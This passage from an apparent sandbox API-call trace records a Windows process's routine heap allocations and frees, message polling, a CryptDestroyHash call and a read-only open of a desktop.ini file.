wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0090.010] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0090.011] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0090.011] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0090.011] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0090.011] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0090.011] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f7160, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0090.011] CryptDestroyHash (hHash=0x9a3f00) returned 1 [0090.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x2a74958 [0090.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0090.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0090.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ca0 [0090.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9cb8 [0090.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e98 [0090.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0090.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e98 | out: hHeap=0x2af0000) returned 1 [0090.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0090.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cb8 | out: hHeap=0x2af0000) returned 1 [0090.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e08 [0090.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9cb8 [0090.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9cd0 [0090.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0090.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cd0 | out: hHeap=0x2af0000) returned 1 [0090.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0090.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cb8 | out: hHeap=0x2af0000) returned 1 [0090.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0090.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c88 | out: hHeap=0x2af0000) returned 1 [0090.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e68 | out: hHeap=0x2af0000) returned 1 [0090.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0090.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e38 | out: hHeap=0x2af0000) returned 1 [0090.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c58 | out: hHeap=0x2af0000) returned 1 [0090.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d00 | out: hHeap=0x2af0000) returned 1 [0090.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c70 | out: hHeap=0x2af0000) returned 1 [0090.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d78 | out: hHeap=0x2af0000) returned 1 [0090.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d60 | out: hHeap=0x2af0000) returned 1 [0090.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dd8 | out: hHeap=0x2af0000) returned 1 [0090.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d30 | out: hHeap=0x2af0000) returned 1 [0090.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0090.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ca0 | out: hHeap=0x2af0000) returned 1 [0090.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e08 | out: hHeap=0x2af0000) returned 1 [0090.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0090.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0090.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74958 | out: hHeap=0x2af0000) returned 1 [0090.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0090.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0090.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0090.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0090.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0090.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0090.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0090.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0090.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0090.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0090.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0090.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0090.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0090.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9da8 | out: hHeap=0x2af0000) returned 1 [0090.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0090.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dc0 | out: hHeap=0x2af0000) returned 1 [0090.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c40 | out: hHeap=0x2af0000) returned 1 [0090.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f28 | out: hHeap=0x2af0000) returned 1 [0090.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d18 | out: hHeap=0x2af0000) returned 1 [0090.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9df0 | out: hHeap=0x2af0000) returned 1 [0090.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0090.012] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0090.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f28 [0090.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c88 [0090.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0090.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0090.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d60 [0090.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0090.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9dd8 [0090.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d90 [0090.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0090.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c58 [0090.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0090.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c58 | out: hHeap=0x2af0000) returned 1 [0090.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d90 | out: hHeap=0x2af0000) returned 1 [0090.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dd8 | out: hHeap=0x2af0000) returned 1 [0090.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0090.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e20 [0090.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0090.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0090.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c88 | out: hHeap=0x2af0000) returned 1 [0090.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d60 | out: hHeap=0x2af0000) returned 1 [0090.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e20 | out: hHeap=0x2af0000) returned 1 [0090.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f28 | out: hHeap=0x2af0000) returned 1 [0090.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0090.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0090.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0090.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0090.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0090.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d50 | out: hHeap=0x2af0000) returned 1 [0090.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0090.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0090.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0090.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77df0 | out: hHeap=0x2af0000) returned 1 [0090.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9eb0 | out: hHeap=0x2af0000) returned 1 [0090.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ec8 | out: hHeap=0x2af0000) returned 1 [0090.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ee0 | out: hHeap=0x2af0000) returned 1 [0090.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ef8 | out: hHeap=0x2af0000) returned 1 [0090.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f10 | out: hHeap=0x2af0000) returned 1 [0090.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa138 | out: hHeap=0x2af0000) returned 1 [0090.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7140 | out: hHeap=0x2af0000) returned 1 [0090.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0090.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7698 | out: hHeap=0x2af0000) returned 1 [0090.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0090.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f08 | out: hHeap=0x2af0000) returned 1 [0090.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0090.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0090.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0090.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0090.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a69ac0 | out: hHeap=0x2af0000) returned 1 [0090.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0090.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0090.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7080 | out: hHeap=0x2af0000) returned 1 [0090.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0090.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781d8 | out: hHeap=0x2af0000) returned 1 [0090.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0090.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782c8 | out: hHeap=0x2af0000) returned 1 [0090.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0090.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0090.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0090.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0090.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0090.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0090.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780c0 | out: hHeap=0x2af0000) returned 1 [0090.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0090.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781b0 | out: hHeap=0x2af0000) returned 1 [0090.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0090.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0090.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0090.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f30 | out: hHeap=0x2af0000) returned 1 [0090.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0090.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780e8 | out: hHeap=0x2af0000) returned 1 [0090.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0090.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ff8 | out: hHeap=0x2af0000) returned 1 [0090.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0090.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0090.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0090.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0090.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0090.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0090.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0090.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0090.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0090.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0090.015] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71688 [0090.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0090.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e6c0 [0090.015] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e6c0 | out: hHeap=0x2af0000) returned 1 [0090.015] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0090.015] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a715e8 [0090.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0090.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0090.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a716e8 [0090.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0090.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0090.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0090.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a716e8 [0090.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0090.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0090.016] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71688 [0090.016] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0090.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0090.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0090.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0090.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0090.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0090.016] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ecc0 [0090.016] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2aae878 [0090.016] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0090.016] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71688 [0090.016] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/desktop.ini" (normalized: "c:\\users\\fd1hvy\\desktop\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0090.016] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.017] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0090.017] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f71e0 [0090.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0090.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0090.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0090.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0090.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0090.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0090.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0090.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0090.017] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.017] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0090.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0090.017] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e6c0 [0090.017] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e6c0 | out: hHeap=0x2af0000) returned 1 [0090.017] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.017] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0090.017] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0090.017] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0090.017] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0090.017] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0090.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0090.017] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0090.018] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0090.018] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0090.018] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0090.018] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73128 [0090.018] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0090.018] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0090.018] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0090.018] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0090.018] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0090.018] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0090.018] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0090.018] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0090.018] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a75858 [0090.018] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: 